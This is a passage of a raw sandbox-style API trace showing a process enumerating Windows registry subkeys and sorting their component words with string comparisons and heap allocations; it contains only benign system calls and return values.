hKey=0xa4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0060.247] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f4390 [0060.247] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0060.247] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f43b8 [0060.247] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0060.247] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0060.247] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f43b8 | out: hHeap=0x6e0000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f43b8 [0060.248] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0060.248] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0060.248] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0060.248] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0060.248] lstrlenW (lpString="Cryptography") returned 12 [0060.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x26) returned 0x6faaf8 [0060.248] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0060.248] lstrlenW (lpString="DeviceClasses") returned 13 [0060.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f43e0 [0060.248] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0060.248] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0060.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f43e0 | out: hHeap=0x6e0000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f43e0 [0060.248] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0060.248] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0060.248] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0060.248] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0060.248] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0060.248] lstrlenW (lpString="DeviceOverrides") returned 15 [0060.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4408 [0060.248] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0060.249] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0060.249] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f4408 | out: hHeap=0x6e0000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x6f4408 [0060.249] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0060.249] lstrlenW (lpString="Diagnostics") returned 11 [0060.249] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x24) returned 0x6fab28 [0060.249] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0060.249] lstrlenW (lpString="Els") returned 3 [0060.249] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa350 [0060.249] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0060.249] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0060.249] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0060.249] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0060.249] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0060.249] lstrlenW (lpString="Errata") returned 6 [0060.249] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4430 [0060.249] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0060.249] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0060.249] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0060.249] lstrlenW (lpString="FileSystem") returned 10 [0060.250] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa370 [0060.250] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0060.250] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0060.250] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4458 [0060.250] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0060.250] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0060.250] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0060.250] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0060.250] lstrlenW (lpString="FileSystemUtilities") returned 19 [0060.250] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa390 [0060.250] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0060.250] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0060.250] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0060.250] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa390 | out: hHeap=0x6e0000) returned 1 [0060.250] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4480 [0060.250] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0060.250] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0060.250] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0060.250] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0060.250] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f4480 | out: hHeap=0x6e0000) returned 1 [0060.250] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x6f4480 [0060.250] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0060.250] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0060.251] lstrlenW (lpString="GraphicsDrivers") returned 15 [0060.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f44a8 [0060.251] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0060.251] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0060.251] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0060.251] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0060.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f44d0 [0060.251] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0060.251] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0060.251] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0060.251] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0060.251] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0060.251] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0060.251] lstrlenW (lpString="GroupOrderList") returned 14 [0060.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa390 [0060.251] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0060.251] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0060.251] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0060.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa3b0 [0060.251] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0060.251] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0060.251] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0060.251] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0060.251] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa3d0 [0060.252] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0060.252] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0060.252] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0060.252] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0060.252] lstrlenW (lpString="HAL") returned 3 [0060.252] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa3f0 [0060.252] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0060.252] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0060.252] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0060.252] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0060.252] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0060.252] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0060.252] lstrlenW (lpString="IDConfigDB") returned 10 [0060.252] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f44f8 [0060.252] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0060.252] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0060.252] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0060.252] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0060.252] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0060.252] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6fa410 [0060.252] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0060.252] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0060.252] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0060.253] lstrlenW (lpString="Keyboard Layout") returned 15 [0060.253] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f4520 [0060.253] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0060.253] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f4548 [0060.253] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0060.253] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0060.253] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0060.253] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0060.253] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0060.253] lstrlenW (lpString="Keyboard Layouts") returned 16 [0060.253] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6f4570 [0060.253] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0060.253] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0060.253] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f4570 | out: hHeap=0x6e0000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6f4570 [0060.254] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0060.254] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0060.254] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0060.254] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0060.254] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0060.254] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0060.254] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0060.254] lstrlenW (lpString="Lsa") returned 3 [0060.254] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa430 [0060.254] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0060.254] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0060.254] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0060.254] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa450 [0060.254] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0060.254] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0060.255] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa450 | out: hHeap=0x6e0000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x6f4598 [0060.255] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0060.255] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6f45c0 [0060.255] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0060.255] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0060.255] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0060.255] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0060.255] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0060.255] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0060.255] lstrlenW (lpString="LsaInformation") returned 14 [0060.255] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa450 [0060.255] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0060.255] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0060.255] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa450 | out: hHeap=0x6e0000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x24) returned 0x6fab58 [0060.255] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0060.255] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0060.256] lstrlenW (lpString="MediaCategories") returned 15 [0060.256] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa450 [0060.256] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x22) returned 0x6fab88 [0060.256] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0060.256] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0060.256] lstrlenW (lpString="MediaDRM") returned 8 [0060.256] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa470 [0060.256] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0060.256] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0060.275] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0060.275] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0060.275] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa470 | out: hHeap=0x6e0000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa470 [0060.276] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0060.276] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0060.276] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0060.276] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0060.276] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0060.276] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0060.276] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0060.276] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0060.276] lstrlenW (lpString="MediaInterfaces") returned 15 [0060.276] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa490 [0060.276] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0060.276] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0060.276] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0060.276] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0060.276] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0060.276] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0060.276] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa490 | out: hHeap=0x6e0000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x22) returned 0x6fabb8 [0060.276] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0060.277] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0060.277] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0060.277] lstrlenW (lpString="MediaProperties") returned 15 [0060.277] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa490 [0060.277] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0060.277] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0060.277] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa490 | out: hHeap=0x6e0000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x22) returned 0x6fabe8 [0060.277] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0060.277] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0060.277] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0060.277] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0060.277] lstrlenW (lpString="MediaTypes") returned 10 [0060.277] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa490 [0060.277] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0060.277] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0060.277] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0060.278] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa490 | out: hHeap=0x6e0000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa490 [0060.278] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0060.278] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0060.278] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0060.278] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0060.278] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0060.278] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0060.278] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0060.278] lstrlenW (lpString="MobilePC") returned 8 [0060.278] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fac30 [0060.278] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0060.279] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0060.279] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0060.279] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0060.279] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0060.279] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0060.279] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6fa4b0 [0060.279] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0060.279] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0060.279] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0060.279] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0060.279] lstrlenW (lpString="MPDEV") returned 5 [0060.279] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa4d0 [0060.279] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0060.279] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0060.279] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0060.279] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0060.279] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0060.279] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0060.279] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0060.279] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0060.279] lstrlenW (lpString="MSDTC") returned 5 [0060.279] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa4f0 [0060.279] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0060.279] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0060.280] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0060.280] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0060.280] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0060.280] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0060.280] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0060.280] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0060.280] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0060.280] lstrlenW (lpString="MUI") returned 3 [0060.280] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa510 [0060.280] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0060.280] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0060.280] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0060.280] lstrlenW (lpString="NetDiagFx") returned 9 [0060.280] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa530 [0060.280] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0060.280] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0060.280] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0060.280] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0060.281] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa550 [0060.281] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0060.281] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0060.281] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0060.281] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6fa570 [0060.281] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0060.281] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0060.281] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0060.281] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0060.281] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0060.281] lstrlenW (lpString="NetTrace") returned 8 [0060.281] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa590 [0060.281] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0060.281] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0060.282] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0060.282] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0060.282] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0060.282] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa590 | out: hHeap=0x6e0000) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa590 [0060.282] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0060.282] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0060.282] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0060.282] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0060.282] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0060.282] RegEnumKeyW (in: hKey=0xa4, 